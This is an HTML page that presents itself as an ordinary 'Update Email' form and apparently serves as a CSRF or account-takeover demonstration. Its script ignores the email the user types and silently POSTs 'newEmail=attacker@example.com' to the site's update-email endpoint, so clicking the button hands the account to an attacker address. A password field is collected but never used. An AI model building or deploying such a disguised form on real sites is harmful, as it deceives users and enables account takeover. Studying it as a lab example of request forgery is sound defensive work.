<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Update Email and Password</title>
    <link rel="stylesheet" href="css/updateEmail.css">
    <script>
        function updateEmail() {
            var newEmail = document.getElementById('newEmail').value;
            // Simulate a POST request to update-email endpoint
            var xhr = new XMLHttpRequest();
            xhr.open('POST', 'update-email', true);
            xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
            xhr.send('newEmail=attacker@example.com');
        }
    </script>
</head>
<body>
    <div class="newEmail-form">
    <h1>Update Email</h1>
    <!-- Input box for the new email and password -->
    <p><label for="newEmail">Enter New Email:</label>
        <input type="email" id="newEmail" name="newEmail" required></p>

    <p><label for="newPW">Enter New Email password:</label>
        <input type="password" id="newPW" name="newPW" required> </p>
    <button onclick="updateEmail()">Update Email</button>
    </div>
</body>
</html>
